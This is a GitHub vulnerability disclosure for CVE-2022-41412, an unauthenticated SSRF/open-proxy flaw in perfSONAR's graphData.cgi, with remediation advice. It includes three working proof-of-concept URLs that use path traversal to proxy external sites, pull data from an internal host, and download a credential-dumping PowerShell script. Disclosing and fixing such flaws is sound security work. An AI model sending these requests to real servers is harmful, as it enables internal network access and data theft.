Skip to content

renmizo/CVE-2022-41412

main
Switch branches/tags

Name already in use

A tag already exists with the provided branch name. Many Git commands accept both tag and branch names, so creating this branch may cause unexpected behavior. Are you sure you want to create this branch?
Code

Latest commit

 

Git stats

Files

Permalink
Failed to load latest commit information.
Type
Name
Latest commit message
Commit time
November 28, 2022 21:24
November 28, 2022 20:40
November 28, 2022 20:40
November 28, 2022 20:40

Vendor: perfSONAR
Link: https://github.com/perfsonar/
Affected Versions: v4.x <= v4.4.4
Vulnerability Type: Open Proxy Relay
Vulnerability Family: CGI Abuses
Discovered by: Ryan Moore
CVE: CVE-2022-41412

Summary

perfSONAR bundles with it a graphData.cgi script, used to graph and visualize data. There is a flaw in graphData.cgi allowing for unauthenticated users to proxy and relay HTTP/HTTPS traffic through the perfSONAR server. The vulnerability can potentially be leveraged to exfiltrate or enumerate data from internal web servers.

This vulnerability was patched in perfSONAR v4.4.5.

There is a whitelisting function that will mitigate, but is disabled by default.

Proof of Concept

Examples

Here are three examples of this vulnerability in use. To pass a regex match, the URL must include /esmond/perfsonar/archive/../../../ .

Example 1:

In this example, www.google.com is proxied through perfSONAR server.
https://192.168.68.145/perfsonar-graphs/cgi-bin/graphData.cgi?action=ma_data&url=https://www.google.com/esmond/perfsonar/archive/../../../&src=8.8.8.8&dest=8.8.4.4

This is an image

Example 2:

In this example, sample data is exfiltrated from another adjacent internal web host, running an arbitrary port 4444.
https://192.168.68.145/perfsonar-graphs/cgi-bin/graphData.cgi?action=ma_data&url=http://192.168.68.113:4444/esmond/perfsonar/archive/../../../&src=8.8.8.8&dest=8.8.4.4

This is an image

Example 3:

In this example, we are able to download a malicious Powershell script through the perfSONAR server.
https://192.168.68.145/perfsonar-graphs/cgi-bin/graphData.cgi?action=ma_data&url=https://raw.githubusercontent.com/esmond/perfsonar/archive/../../../EmpireProject/Empire/master/data/module_source/credentials/Invoke-PowerDump.ps1&src=8.8.8.8&dest=8.8.4.4

This is an image

Remediation

Enable whitelisting in perfSONAR.
Update perfSONAR to 4.4.5 or newer.

References

About

No description, website, or topics provided.

Resources

Stars

Watchers

Forks

Releases

No releases published

Packages

No packages published